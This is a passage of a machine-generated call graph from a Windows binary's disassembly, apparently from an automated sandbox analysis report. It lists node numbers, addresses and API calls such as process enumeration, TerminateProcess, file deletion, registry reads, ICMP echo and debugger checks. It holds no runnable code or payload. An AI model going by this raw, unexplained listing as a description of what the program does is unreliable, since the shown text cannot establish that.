102727->102728 102729 c7112b IcmpSendEcho 102727->102729 102730 c7114c 102728->102730 102729->102730 102731 c71212 IcmpCloseHandle WSACleanup 102730->102731 102731->102732 102732->102547 102734 c77b52 102733->102734 102735 c77b38 102733->102735 102737 c760e6 8 API calls 102734->102737 103299 c63fe1 81 API calls __wsopen_s 102735->103299 102738 c77b5d 102737->102738 102739 c00340 223 API calls 102738->102739 102740 c77bc1 102739->102740 102741 c77b4a 102740->102741 102742 c77c03 102740->102742 102743 c77c5c 102740->102743 102741->102519 102749 c6148b 8 API calls 102742->102749 102744 c77cb0 102743->102744 102746 c77c62 102743->102746 102744->102741 102745 bf8ec0 52 API calls 102744->102745 102747 c77cc2 102745->102747 103300 c61ad8 8 API calls 102746->103300 102750 bfc2c9 8 API calls 102747->102750 102753 c77c3b 102749->102753 102754 c77ce6 CharUpperBuffW 102750->102754 102751 c77c85 103301 bfbd07 8 API calls 102751->103301 102755 c02b20 223 API calls 102753->102755 102756 c77d00 102754->102756 102755->102741 102757 c77d07 102756->102757 102758 c77d53 102756->102758 102761 c6148b 8 API calls 102757->102761 102759 bf8ec0 52 API calls 102758->102759 102760 c77d5b 102759->102760 103302 c0aa65 9 API calls 102760->103302 102763 c77d35 102761->102763 102764 c02b20 223 API calls 102763->102764 102764->102741 102765 c77d65 102765->102741 102766 bf8ec0 52 API calls 102765->102766 102767 c77d80 102766->102767 103303 bfbd07 8 API calls 102767->103303 102769->102556 102770->102517 102772 bfb338 _wcslen 102771->102772 102773 c1017b 8 API calls 102772->102773 102774 bfb360 __fread_nolock 102773->102774 102775 c1014b 8 API calls 102774->102775 102776 bfb376 102775->102776 102776->102530 102777->102520 102778->102529 102779->102541 102780->102541 102781->102547 102782->102547 102783->102547 102784->102548 102785->102547 102786->102605 102787->102603 102788->102607 102789->102610 102791 bfc99e 102790->102791 102792 bfc9a5 102790->102792 102791->102792 102795 c16641 39 API calls _strftime 102791->102795 102792->102613 102794 bfc9e8 102794->102613 102795->102794 102806 c5e80e 102796->102806 102798 c5ddd4 Process32NextW 102799 c5de86 CloseHandle 102798->102799 102800 c5ddcd 102798->102800 102799->102622 102800->102798 102800->102799 102801 bfbf73 8 API calls 102800->102801 102802 bfb329 8 API calls 102800->102802 102812 bf568e 102800->102812 102854 bf7bb5 102800->102854 102863 c0e36b 41 API calls 102800->102863 102801->102800 102802->102800 102807 c5e819 102806->102807 102808 c5e830 102807->102808 102811 c5e836 102807->102811 102864 c16722 GetStringTypeW _strftime 102807->102864 102865 c1666b 39 API calls _strftime 102808->102865 102811->102800 102813 bfbf73 8 API calls 102812->102813 102814 bf56a4 102813->102814 102815 bfbf73 8 API calls 102814->102815 102816 bf56ac 102815->102816 102817 bfbf73 8 API calls 102816->102817 102818 bf56b4 102817->102818 102819 bfbf73 8 API calls 102818->102819 102820 bf56bc 102819->102820 102821 c34da1 102820->102821 102822 bf56f0 102820->102822 102823 bfbed9 8 API calls 102821->102823 102824 bfacc0 8 API calls 102822->102824 102825 c34daa 102823->102825 102826 bf56fe 102824->102826 102885 bfbd57 102825->102885 102878 bfadf4 102826->102878 102829 bf5708 102830 bfacc0 8 API calls 102829->102830 102831 bf5733 102829->102831 102832 bf5729 102830->102832 102833 bf5754 102831->102833 102846 bf5778 102831->102846 102853 c34dcc 102831->102853 102836 bfadf4 8 API calls 102832->102836 102833->102846 102882 bf655e 102833->102882 102835 bf5789 102840 bfbed9 8 API calls 102835->102840 102841 bf579f 102835->102841 102836->102831 102840->102841 102843 bf57b3 102841->102843 102844 bfbed9 8 API calls 102841->102844 102842 bf57be 102848 bfbed9 8 API calls 102842->102848 102851 bf57c9 102842->102851 102843->102842 102847 bfbed9 8 API calls 102843->102847 102844->102843 102845 bfacc0 8 API calls 102845->102846 102866 bfacc0 102846->102866 102847->102842 102848->102851 102849 bf655e 8 API calls 102850 c34e8c 102849->102850 102850->102846 102850->102849 102903 bfad40 8 API calls __fread_nolock 102850->102903 102851->102800 102891 bf8577 102853->102891 102855 bf7bc7 102854->102855 102856 c3641d 102854->102856 102912 bf7bd8 102855->102912 102922 c513c8 8 API calls __fread_nolock 102856->102922 102859 c36427 102861 c36433 102859->102861 102862 bfbed9 8 API calls 102859->102862 102860 bf7bd3 102860->102800 102862->102861 102863->102800 102864->102807 102865->102811 102867 bfaccf 102866->102867 102869 bface1 102866->102869 102876 bfacda __fread_nolock 102867->102876 102905 bfc2c9 102867->102905 102869->102867 102871 c40557 102869->102871 102872 bfad07 102869->102872 102870 c405a3 __fread_nolock 102873 c1014b 8 API calls 102871->102873 102904 bf88e8 8 API calls 102872->102904 102875 c40561 102873->102875 102877 c1017b 8 API calls 102875->102877 102876->102835 102877->102867 102879 bfae0b __fread_nolock 102878->102879 102880 bfae02 102878->102880 102879->102829 102880->102879 102881 bfc2c9 8 API calls 102880->102881 102881->102879 102883 bfc2c9 8 API calls 102882->102883 102884 bf5761 102883->102884 102884->102845 102884->102846 102886 bfbd71 102885->102886 102890 bfbd64 102885->102890 102887 c1014b 8 API calls 102886->102887 102888 bfbd7b 102887->102888 102889 c1017b 8 API calls 102888->102889 102889->102890 102890->102831 102892 c36610 102891->102892 102895 bf8587 _wcslen 102891->102895 102893 bfadf4 8 API calls 102892->102893 102894 c36619 102893->102894 102894->102894 102896 bf859d 102895->102896 102897 bf85c2 102895->102897 102911 bf88e8 8 API calls 102896->102911 102898 c1014b 8 API calls 102897->102898 102900 bf85ce 102898->102900 102902 c1017b 8 API calls 102900->102902 102901 bf85a5 __fread_nolock 102901->102850 102902->102901 102903->102850 102904->102876 102906 bfc2dc 102905->102906 102907 bfc2d9 __fread_nolock 102905->102907 102908 c1014b 8 API calls 102906->102908 102907->102870 102909 bfc2e7 102908->102909 102910 c1017b 8 API calls 102909->102910 102910->102907 102911->102901 102913 bf7c1b __fread_nolock 102912->102913 102914 bf7be7 102912->102914 102913->102860 102914->102913 102915 c3644e 102914->102915 102916 bf7c0e 102914->102916 102918 c1014b 8 API calls 102915->102918 102923 bf7d74 102916->102923 102919 c3645d 102918->102919 102920 c1017b 8 API calls 102919->102920 102921 c36491 __fread_nolock 102920->102921 102922->102859 102924 bf7d8a 102923->102924 102926 bf7d85 __fread_nolock 102923->102926 102925 c1017b 8 API calls 102924->102925 102927 c36528 102924->102927 102925->102926 102926->102913 102927->102927 102928->102636 102929->102639 102930->102643 102932 bf8ec0 52 API calls 102931->102932 102933 c789ed 102932->102933 102956 c78a32 messages 102933->102956 102969 c79730 102933->102969 102935 c78cde 102936 c78eac 102935->102936 102941 c78cec 102935->102941 103019 c79941 59 API calls 102936->103019 102939 c78ebb 102940 c78ec7 102939->102940 102939->102941 102940->102956 102982 c788e3 102941->102982 102942 bf8ec0 52 API calls 102960 c78aa6 102942->102960 102947 c78d25 102996 c0ffe0 102947->102996 102950 c78d45 103003 c63fe1 81 API calls __wsopen_s 102950->103003 102951 c78d5f 103004 bf7e12 102951->103004 102954 c78d50 GetCurrentProcess TerminateProcess 102954->102951 102956->102647 102960->102935 102960->102942 102960->102956 103001 c54ad3 8 API calls __fread_nolock 102960->103001 103002 c78f7a 41 API calls _strftime 102960->103002 102961 c78f22 102961->102956 102965 c78f36 FreeLibrary 102961->102965 102962 c78d9e 103016 c795d8 74 API calls 102962->103016 102965->102956 102967 c78daf 102967->102961 103017 c01ca0 8 API calls 102967->103017 103018 bfb4c8 8 API calls 102967->103018 103020 c795d8 74 API calls 102967->103020 102970 bfc2c9 8 API calls 102969->102970 102971 c7974b CharLowerBuffW 102970->102971 103021 c59805 102971->103021 102975 bfbf73 8 API calls 102976 c79787 102975->102976 102977 bfacc0 8 API calls 102976->102977 102978 c7979b 102977->102978 102979 bfadf4 8 API calls 102978->102979 102981 c797a5 _wcslen 102979->102981 102980 c798bb _wcslen 102980->102960 102981->102980 103028 c78f7a 41 API calls _strftime 102981->103028 102983 c788fe 102982->102983 102987 c78949 102982->102987 102984 c1017b 8 API calls 102983->102984 102985 c78920 102984->102985 102986 c1014b 8 API calls 102985->102986 102985->102987 102986->102985 102988 c79af3 102987->102988 102989 c79d08 messages 102988->102989 102993 c79b17 _strcat _wcslen ___std_exception_copy 102988->102993 102989->102947 102990 bfc63f 39 API calls 102990->102993 102991 bfc98d 39 API calls 102991->102993 102992 bfca5b 39 API calls 102992->102993 102993->102989 102993->102990 102993->102991 102993->102992 102994 bf8ec0 52 API calls 102993->102994 103031 c5f8c5 10 API calls _wcslen 102993->103031 102994->102993 102998 c0fff5 102996->102998 102997 c1008d Sleep 102999 c1005b 102997->102999 102998->102997 102998->102999 103000 c1007b CloseHandle 102998->103000 102999->102950 102999->102951 103000->102999 103001->102960 103002->102960 103003->102954 103005 bf7e1a 103004->103005 103006 c1014b 8 API calls 103005->103006 103007 bf7e28 103006->103007 103032 bf8445 103007->103032 103010 bf8470 103035 bfc760 103010->103035 103012 bf8480 103013 c1017b 8 API calls 103012->103013 103014 bf851c 103012->103014 103013->103014 103014->102967 103015 c01ca0 8 API calls 103014->103015 103015->102962 103016->102967 103017->102967 103018->102967 103019->102939 103020->102967 103022 c59825 _wcslen 103021->103022 103023 c59914 103022->103023 103025 c5985a 103022->103025 103027 c59919 103022->103027 103023->102975 103023->102981 103025->103023 103029 c0e36b 41 API calls 103025->103029 103027->103023 103030 c0e36b 41 API calls 103027->103030 103028->102980 103029->103025 103030->103027 103031->102993 103033 c1014b 8 API calls 103032->103033 103034 bf7e30 103033->103034 103034->103010 103036 bfc76b 103035->103036 103037 c41285 103036->103037 103042 bfc773 messages 103036->103042 103039 c1014b 8 API calls 103037->103039 103038 bfc77a 103038->103012 103040 c41291 103039->103040 103042->103038 103043 bfc7e0 8 API calls messages 103042->103043 103043->103042 103045 c618b6 103044->103045 103046 c1014b 8 API calls 103045->103046 103047 c618bd 103046->103047 103050 c5fcb5 103047->103050 103049 c618f7 103049->102653 103051 bfc2c9 8 API calls 103050->103051 103052 c5fcc8 CharLowerBuffW 103051->103052 103053 c5fcdb 103052->103053 103054 c5fd19 103053->103054 103055 bf655e 8 API calls 103053->103055 103067 c5fce5 ___scrt_fastfail 103053->103067 103056 c5fd2b 103054->103056 103057 bf655e 8 API calls 103054->103057 103055->103053 103058 c1017b 8 API calls 103056->103058 103057->103056 103062 c5fd59 103058->103062 103061 c5fdb8 103064 c1014b 8 API calls 103061->103064 103061->103067 103063 c5fd7b 103062->103063 103083 c5fbed 8 API calls 103062->103083 103068 c5fe0c 103063->103068 103065 c5fdd2 103064->103065 103066 c1017b 8 API calls 103065->103066 103066->103067 103067->103049 103069 bfbf73 8 API calls 103068->103069 103070 c5fe3e 103069->103070 103071 bfbf73 8 API calls 103070->103071 103072 c5fe47 103071->103072 103073 bfbf73 8 API calls 103072->103073 103078 c5fe50 103073->103078 103074 bf8577 8 API calls 103074->103078 103075 c60114 103075->103061 103076 bfad40 8 API calls 103076->103078 103077 c166f8 GetStringTypeW 103077->103078 103078->103074 103078->103075 103078->103076 103078->103077 103080 c16641 39 API calls 103078->103080 103081 c5fe0c 40 API calls 103078->103081 103082 bfbed9 8 API calls 103078->103082 103084 c16722 GetStringTypeW _strftime 103078->103084 103080->103078 103081->103078 103082->103078 103083->103062 103084->103078 103117 c602aa 103085->103117 103087 c60399 __fread_nolock 103087->102661 103089 c603f3 103133 c605e9 56 API calls __fread_nolock 103089->103133 103090 c6040b 103092 c60471 103090->103092 103095 c6041b 103090->103095 103092->103087 103093 c60507 103092->103093 103094 c604a1 103092->103094 103097 c605b0 103093->103097 103098 c60510 103093->103098 103096 c604d1 103094->103096 103105 c604a6 103094->103105 103116 c60453 103095->103116 103134 c62855 10 API calls 103095->103134 103096->103087 103138 bfca5b 39 API calls 103096->103138 103097->103087 103142 bfc63f 39 API calls 103097->103142 103099 c60515 103098->103099 103100 c6058d 103098->103100 103106 c60554 103099->103106 103107 c6051b 103099->103107 103100->103087 103141 bfc63f 39 API calls 103100->103141 103105->103087 103137 bfca5b 39 API calls 103105->103137 103106->103087 103140 bfc63f 39 API calls 103106->103140 103107->103087 103139 bfc63f 39 API calls 103107->103139 103112 c60427 103135 c62855 10 API calls 103112->103135 103114 c6043e __fread_nolock 103136 c62855 10 API calls 103114->103136 103124 c61844 103116->103124 103118 c602f7 103117->103118 103122 c602bb 103117->103122 103120 bfc98d 39 API calls 103118->103120 103119 c602f5 103119->103087 103119->103089 103119->103090 103120->103119 103121 bf8ec0 52 API calls 103121->103122 103122->103119 103122->103121 103143 c14d98 103122->103143 103125 c6184f 103124->103125 103126 c1014b 8 API calls 103125->103126 103127 c61856 103126->103127 103128 c61862 103127->103128 103129 c61883 103127->103129 103131 c1017b 8 API calls 103128->103131 103130 c1017b 8 API calls 103129->103130 103132 c6186b ___scrt_fastfail 103130->103132 103131->103132 103132->103087 103133->103087 103134->103112 103135->103114 103136->103116 103137->103087 103138->103087 103139->103087 103140->103087 103141->103087 103142->103087 103144 c14da6 103143->103144 103145 c14e1b 103143->103145 103149 c14dcb 103144->103149 103153 c1f649 20 API calls __dosmaperr 103144->103153 103155 c14e2d 40 API calls 4 library calls 103145->103155 103148 c14e28 103148->103122 103149->103122 103150 c14db2 103154 c22b5c 26 API calls __cftof 103150->103154 103152 c14dbd 103152->103122 103153->103150 103154->103152 103155->103148 103157 bfbf73 8 API calls 103156->103157 103158 c5dc73 103157->103158 103159 bfbf73 8 API calls 103158->103159 103160 c5dc7c 103159->103160 103161 bfbf73 8 API calls 103160->103161 103162 c5dc85 103161->103162 103180 bf5851 103162->103180 103167 c5dcab 103169 bf568e 8 API calls 103167->103169 103168 bf6b7c 8 API calls 103168->103167 103170 c5dcbf FindFirstFileW 103169->103170 103171 c5dd4b FindClose 103170->103171 103174 c5dcde 103170->103174 103176 c5dd56 103171->103176 103172 c5dd26 FindNextFileW 103172->103174 103173 bfbed9 8 API calls 103173->103174 103174->103171 103174->103172 103174->103173 103175 bf7bb5 8 API calls 103174->103175 103192 bf6b7c 103174->103192 103175->103174 103176->102666 103179 c5dd42 FindClose 103179->103176 103201 c322d0 103180->103201 103183 bf587d 103185 bf8577 8 API calls 103183->103185 103184 bf5898 103186 bfbd57 8 API calls 103184->103186 103187 bf5889 103185->103187 103186->103187 103203 bf55dc 103187->103203 103190 c5eab0 GetFileAttributesW 103191 c5dc99 103190->103191 103191->103167 103191->103168 103193 bf6b93 103192->103193 103194 c357fe 103192->103194 103207 bf6ba4 103193->103207 103195 c1014b 8 API calls 103194->103195 103198 c35808 _wcslen 103195->103198 103197 bf6b9e DeleteFileW 103197->103172 103197->103179 103199 c1017b 8 API calls 103198->103199 103200 c35841 __fread_nolock 103199->103200 103202 bf585e GetFullPathNameW 103201->103202 103202->103183 103202->103184 103204 bf55ea 103203->103204 103205 bfadf4 8 API calls 103204->103205 103206 bf55fe 103205->103206 103206->103190 103208 bf6bb4 _wcslen 103207->103208 103209 c35860 103208->103209 103210 bf6bc7 103208->103210 103211 c1014b 8 API calls 103209->103211 103212 bf7d74 8 API calls 103210->103212 103213 c3586a 103211->103213 103214 bf6bd4 __fread_nolock 103212->103214 103215 c1017b 8 API calls 103213->103215 103214->103197 103216 c3589a __fread_nolock 103215->103216 103218 c1014b 8 API calls 103217->103218 103219 bf424e 103218->103219 103219->102674 103220->102677 103222 c1014b 8 API calls 103221->103222 103223 c0bc65 103222->103223 103224 bfb329 8 API calls 103223->103224 103225 c0bc70 103224->103225 103225->102685 103227 bf3996 ___scrt_fastfail 103226->103227 103247 bf5f32 103227->103247 103230 bf3a1c 103232 bf3a3a Shell_NotifyIconW 103230->103232 103233 c340cd Shell_NotifyIconW 103230->103233 103251 bf61a9 103232->103251 103235 bf3a50 103235->102695 103237 bf3969 103236->103237 103238 bf3919 ___scrt_fastfail 103236->103238 103237->102695 103239 bf3938 Shell_NotifyIconW 103238->103239 103239->103237 103241 c1017b 8 API calls 103240->103241 103242 bf7afa 103241->103242 103243 c1014b 8 API calls 103242->103243 103244 bf7b08 103243->103244 103244->102695 103245->102695 103246->102695 103248 bf5f4e 103247->103248 103249 bf39eb 103247->103249 103248->103249 103250 c35070 DestroyIcon 103248->103250 103249->103230 103281 c5d11f 42 API calls _strftime 103249->103281 103250->103249 103252 bf62a8 103251->103252 103253 bf61c6 103251->103253 103252->103235 103254 bf7ad5 8 API calls 103253->103254 103255 bf61d4 103254->103255 103256 c35278 LoadStringW 103255->103256 103257 bf61e1 103255->103257 103260 c35292 103256->103260 103258 bf8577 8 API calls 103257->103258 103259 bf61f6 103258->103259 103261 bf6203 103259->103261 103269 c352ae 103259->103269 103263 bfbed9 8 API calls 103260->103263 103266 bf6229 ___scrt_fastfail 103260->103266 103261->103260 103262 bf620d 103261->103262 103264 bf6b7c 8 API calls 103262->103264 103263->103266 103265 bf621b 103264->103265 103267 bf7bb5 8 API calls 103265->103267 103270 bf628e Shell_NotifyIconW 103266->103270 103267->103266 103268 c352f1 103283 c0fe6f 51 API calls 103268->103283 103269->103266 103269->103268 103271 bfbf73 8 API calls 103269->103271 103270->103252 103272 c352d8 103271->103272 103282 c5a350 9 API calls 103272->103282 103275 c35310 103277 bf6b7c 8 API calls 103275->103277 103276 c352e3 103278 bf7bb5 8 API calls 103276->103278 103279 c35321 103277->103279 103278->103268 103280 bf6b7c 8 API calls 103279->103280 103280->103266 103281->103230 103282->103276 103283->103275 103285 c1017b 8 API calls 103284->103285 103286 c0c209 103285->103286 103287 c1014b 8 API calls 103286->103287 103288 c0c215 103287->103288 103288->102716 103290 c0fa35 103289->103290 103291 c0f9fe 103289->103291 103298 c0fe8a 8 API calls 103290->103298 103292 c1017b 8 API calls 103291->103292 103294 c0fa05 WideCharToMultiByte 103292->103294 103297 c0fa3e 8 API calls __fread_nolock 103294->103297 103296 c0fa29 103296->102721 103297->103296 103298->103296 103299->102741 103300->102751 103301->102741 103302->102765 103303->102741 103304->102580 103305->102580 103306->102579 103307->102583 103308->102480 103309->102477 103310->102482 103311->102482 103312 bfdd3d 103313 c419c2 103312->103313 103314 bfdd63 103312->103314 103317 c41a82 103313->103317 103322 c41a26 103313->103322 103325 c41a46 103313->103325 103315 bfdead 103314->103315 103318 c1014b 8 API calls 103314->103318 103319 c1017b 8 API calls 103315->103319 103357 c63fe1 81 API calls __wsopen_s 103317->103357 103323 bfdd8d 103318->103323 103330 bfdee4 __fread_nolock 103319->103330 103320 c41a7d 103355 c0e6e8 224 API calls 103322->103355 103326 c1014b 8 API calls 103323->103326 103323->103330 103325->103320 103356 c63fe1 81 API calls __wsopen_s 103325->103356 103327 bfdddb 103326->103327 103327->103322 103329 bfde16 103327->103329 103328 c1017b 8 API calls 103328->103330 103331 c00340 224 API calls 103329->103331 103330->103325 103330->103328 103332 bfde29 103331->103332 103332->103320 103332->103330 103333 c41aa5 103332->103333 103334 bfde77 103332->103334 103336 bfd526 103332->103336 103358 c63fe1 81 API calls __wsopen_s 103333->103358 103334->103315 103334->103336 103337 c1014b 8 API calls 103336->103337 103338 bfd589 103337->103338 103339 bfc32d 8 API calls 103338->103339 103340 bfd5b3 103339->103340 103341 c1014b 8 API calls 103340->103341 103351 bfd66e messages 103341->103351 103342 bfc3ab 8 API calls 103352 bfd9ac messages 103342->103352 103345 c41f79 103360 c556ae 8 API calls messages 103345->103360 103347 c41f94 103348 bfbed9 8 API calls 103348->103351 103349 bfc3ab 8 API calls 103349->103351 103350 bfd911 messages 103350->103342 103350->103352 103351->103345 103351->103347 103351->103348 103351->103349 103351->103350 103359 bfb4c8 8 API calls 103351->103359 103353 bfd9c3 103352->103353 103354 c0e30a 8 API calls messages 103352->103354 103354->103352 103355->103325 103356->103320 103357->103320 103358->103320 103359->103351 103360->103347 103703 bff4dc 103704 bfcab0 224 API calls 103703->103704 103705 bff4ea 103704->103705 103706 bf105b 103711 bf52a7 103706->103711 103708 bf106a 103742 c10413 29 API calls __onexit 103708->103742 103710 bf1074 103712 bf52b7 __wsopen_s 103711->103712 103713 bfbf73 8 API calls 103712->103713 103714 bf536d 103713->103714 103743 bf5594 103714->103743 103716 bf5376 103750 bf5238 103716->103750 103719 bf6b7c 8 API calls 103720 bf538f 103719->103720 103756 bf6a7c 103720->103756 103723 bfbf73 8 API calls 103724 bf53a7 103723->103724 103725 bfbd57 8 API calls 103724->103725 103726 bf53b0 RegOpenKeyExW 103725->103726 103727 c34be6 RegQueryValueExW 103726->103727 103732 bf53d2 103726->103732 103728 c34c03 103727->103728 103729 c34c7c RegCloseKey 103727->103729 103730 c1017b 8 API calls 103728->103730 103729->103732 103740 c34c8e _wcslen 103729->103740 103731 c34c1c 103730->103731 103733 bf423c 8 API calls 103731->103733 103732->103708 103734 c34c27 RegQueryValueExW 103733->103734 103735 c34c44 103734->103735 103737 c34c5e messages 103734->103737 103736 bf8577 8 API calls 103735->103736 103736->103737 103737->103729 103738 bfb329 8 API calls 103738->103740 103739 bf6a7c 8 API calls 103739->103740 103740->103732 103740->103738 103740->103739 103741 bf655e 8 API calls 103740->103741 103741->103740 103742->103710 103744 c322d0 __wsopen_s 103743->103744 103745 bf55a1 GetModuleFileNameW 103744->103745 103746 bfb329 8 API calls 103745->103746 103747 bf55c7 103746->103747 103748 bf5851 9 API calls 103747->103748 103749 bf55d1 103748->103749 103749->103716 103751 c322d0 __wsopen_s 103750->103751 103752 bf5245 GetFullPathNameW 103751->103752 103753 bf5267 103752->103753 103754 bf8577 8 API calls 103753->103754 103755 bf5285 103754->103755 103755->103719 103757 bf6a8b 103756->103757 103761 bf6aac __fread_nolock 103756->103761 103759 c1017b 8 API calls 103757->103759 103758 c1014b 8 API calls 103760 bf539e 103758->103760 103759->103761 103760->103723 103761->103758 103762 bf1098 103767 bf5fc8 103762->103767 103766 bf10a7 103768 bfbf73 8 API calls 103767->103768 103769 bf5fdf GetVersionExW 103768->103769 103770 bf8577 8 API calls 103769->103770 103771 bf602c 103770->103771 103772 bfadf4 8 API calls 103771->103772 103784 bf6062 103771->103784 103773 bf6056 103772->103773 103775 bf55dc 8 API calls 103773->103775 103774 bf611c GetCurrentProcess IsWow64Process 103776 bf6138 103774->103776 103775->103784 103777 c35269 GetSystemInfo 103776->103777 103778 bf6150 LoadLibraryA 103776->103778 103779 bf619d GetSystemInfo 103778->103779 103780 bf6161 GetProcAddress 103778->103780 103781 bf6177 103779->103781 103780->103779 103783 bf6171 GetNativeSystemInfo 103780->103783 103785 bf617b FreeLibrary 103781->103785 103786 bf109d 103781->103786 103782 c35224 103783->103781 103784->103774 103784->103782 103785->103786 103787 c10413 29 API calls __onexit 103786->103787 103787->103766 103361 bf36f5 103364 bf370f 103361->103364 103365 bf3726 103364->103365 103366 bf372b 103365->103366 103367 bf378a 103365->103367 103404 bf3788 103365->103404 103368 bf3738 103366->103368 103369 bf3804 PostQuitMessage 103366->103369 103371 c33df4 103367->103371 103372 bf3790 103367->103372 103373 c33e61 103368->103373 103374 bf3743 103368->103374 103398 bf3709 103369->103398 103370 bf376f DefWindowProcW 103370->103398 103419 bf2f92 10 API calls 103371->103419 103376 bf37bc SetTimer RegisterWindowMessageW 103372->103376 103377 bf3797 103372->103377 103422 c5c8f7 65 API calls ___scrt_fastfail 103373->103422 103380 bf380e 103374->103380 103381 bf374d 103374->103381 103382 bf37e5 CreatePopupMenu 103376->103382 103376->103398 103378 c33d95 103377->103378 103379 bf37a0 KillTimer 103377->103379 103391 c33dd0 MoveWindow 103378->103391 103392 c33d9a 103378->103392 103385 bf3907 Shell_NotifyIconW 103379->103385 103409 c0fcad 103380->103409 103386 c33e46 103381->103386 103387 bf3758 103381->103387 103382->103398 103384 c33e15 103420 c0f23c 40 API calls 103384->103420 103395 bf37b3 103385->103395 103386->103370 103421 c51423 8 API calls 103386->103421 103396 bf3763 103387->103396 103397 bf37f2 103387->103397 103388 c33e73 103388->103370 103388->103398 103391->103398 103393 c33da0 103392->103393 103394 c33dbf SetFocus 103392->103394 103393->103396 103399 c33da9 103393->103399 103394->103398 103416 bf59ff DeleteObject DestroyWindow 103395->103416 103396->103370 103406 bf3907 Shell_NotifyIconW 103396->103406 103417 bf381f 75 API calls ___scrt_fastfail 103397->103417 103418 bf2f92 10 API calls 103399->103418 103404->103370 103405 bf3802 103405->103398 103407 c33e3a 103406->103407 103408 bf396b 60 API calls 103407->103408 103408->103404 103410 c0fd4b 103409->103410 103411 c0fcc5 ___scrt_fastfail 103409->103411 103410->103398 103412 bf61a9 55 API calls 103411->103412 103414 c0fcec 103412->103414 103413 c0fd34 KillTimer SetTimer 103413->103410 103414->103413 103415 c4fe2b Shell_NotifyIconW 103414->103415 103415->103413 103416->103398 103417->103405 103418->103398 103419->103384 103420->103396 103421->103404 103422->103388 103788 c1076b 103789 c10777 CallCatchBlock 103788->103789 103818 c10221 103789->103818 103791 c1077e 103792 c108d1 103791->103792 103795 c107a8 103791->103795 103856 c10baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103792->103856 103794 c108d8 103857 c151c2 28 API calls _abort 103794->103857 103805 c107e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103795->103805 103829 c227ed 103795->103829 103797 c108de 103858 c15174 28 API calls _abort 103797->103858 103801 c108e6 103802 c107c7 103804 c10848 103837 c10cc9 103804->103837 103805->103804 103852 c1518a 38 API calls 3 library calls 103805->103852 103807 c1084e 103841 bf331b 103807->103841 103812 c1086a 103812->103794 103813 c1086e 103812->103813 103814 c10877 103813->103814 103854 c15165 28 API calls _abort 103813->103854 103855 c103b0 13 API calls 2 library calls 103814->103855 103817 c1087f 103817->103802 103819 c1022a 103818->103819 103859 c10a08 IsProcessorFeaturePresent 103819->103859 103821 c10236 103860 c13004 10 API calls 3 library calls 103821->103860 103823 c1023b 103828 c1023f 103823->103828 103861 c22687 103823->103861 103826 c10256 103826->103791 103828->103791 103832 c22804 103829->103832 103830 c10dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 103831 c107c1 103830->103831 103831->103802 103833 c22791 103831->103833 103832->103830 103834 c227c0 103833->103834 103835 c10dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 103834->103835 103836 c227e9 103835->103836 103836->103805 103912 c126b0 103837->103912 103840 c10cef 103840->103807 103842 bf3327 IsThemeActive 103841->103842 103843 bf3382 103841->103843 103914 c152b3 103842->103914 103853 c10d02 GetModuleHandleW 103843->103853 103845 bf3352 103920 c15319 103845->103920 103847 bf3359 103927 bf32e6 SystemParametersInfoW SystemParametersInfoW 103847->103927 103849 bf3360 103928 bf338b 103849->103928 103851 bf3368 SystemParametersInfoW 103851->103843 103852->103804 103853->103812 103854->103814 103855->103817 103856->103794 103857->103797 103858->103801 103859->103821 103860->103823 103865 c2d576 103861->103865 103864 c1302d 8 API calls 3 library calls 103864->103828 103867 c2d58f 103865->103867 103869 c2d593 103865->103869 103883 c10dfc 103867->103883 103868 c10248 103868->103826 103868->103864 103869->103867 103871 c24f6e 103869->103871 103872 c24f7a CallCatchBlock 103871->103872 103890 c232d1 EnterCriticalSection 103872->103890 103874 c24f81 103891 c25422 103874->103891 103876 c24f9f 103906 c24fbb LeaveCriticalSection _abort 103876->103906 103877 c24f90 103877->103876 103904 c24e02 29 API calls 103877->103904 103880 c24fb0 __wsopen_s 103880->103869 103881 c24f9a 103905 c24eb8 GetStdHandle GetFileType 103881->103905 103884 c10e05 103883->103884 103885 c10e07 IsProcessorFeaturePresent 103883->103885 103884->103868 103887 c10fce 103885->103887 103911 c10f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103887->103911 103889 c110b1 103889->103868 103890->103874 103892 c2542e CallCatchBlock 103891->103892 103893 c25452 103892->103893 103894 c2543b 103892->103894 103907 c232d1 EnterCriticalSection 103893->103907 103908 c1f649 20 API calls __dosmaperr 103894->103908 103897 c25440 103909 c22b5c 26 API calls __cftof 103897->103909 103899 c2544a __wsopen_s 103899->103877 103900 c2548a 103910 c254b1 LeaveCriticalSection _abort 103900->103910 103902 c25373 __wsopen_s 21 API calls 103903 c2545e 103902->103903 103903->103900 103903->103902 103904->103881 103905->103876 103906->103880 103907->103903 103908->103897 103909->103899 103910->103899 103911->103889 103913 c10cdc GetStartupInfoW 103912->103913 103913->103840 103915 c152bf CallCatchBlock 103914->103915 103977 c232d1 EnterCriticalSection 103915->103977 103917 c152ca pre_c_initialization 103978 c1530a 103917->103978 103919 c152ff __wsopen_s 103919->103845 103921 c15325 103920->103921 103922 c1533f 103920->103922 103921->103922 103982 c1f649 20 API calls __dosmaperr 103921->103982 103922->103847 103924 c1532f 103983 c22b5c 26 API calls __cftof 103924->103983 103926 c1533a 103926->103847 103927->103849 103929 bf339b __wsopen_s 103928->103929 103930 bfbf73 8 API calls 103929->103930 103931 bf33a7 GetCurrentDirectoryW 103930->103931 103984 bf4fd9 103931->103984 103933 bf33ce IsDebuggerPresent 103934 c33ca3 MessageBoxA 103933->103934 103935 bf33dc 103933->103935 103936 c33cbb 103934->103936 103935->103936 103937 bf33f0 103935->103937 104088 bf4176 8 API calls 103936->104088 104052 bf3a95 103937->104052 103944 bf3462 103946 c33cec SetCurrentDirectoryW 103944->103946 103947 bf346a 103944->103947 103946->103947 103948 bf3475 103947->103948 104089 c51fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103947->104089 104084 bf34d3 7 API calls 103948->104084 103951 c33d07 103951->103948 103955 c33d19 103951->103955 103954 bf347f 103957 bf396b 60 API calls 103954->103957 103962 bf3494 103954->103962 103956 bf5594 10 API calls 103955->103956 103958 c33d22 103956->103958 103957->103962 103959 bfb329 8 API calls 103958->103959 103960 c33d30 103959->103960 103963 c33d38 103960->103963 103964 c33d5f 103960->103964 103961 bf34af 103968 bf34b6 SetCurrentDirectoryW 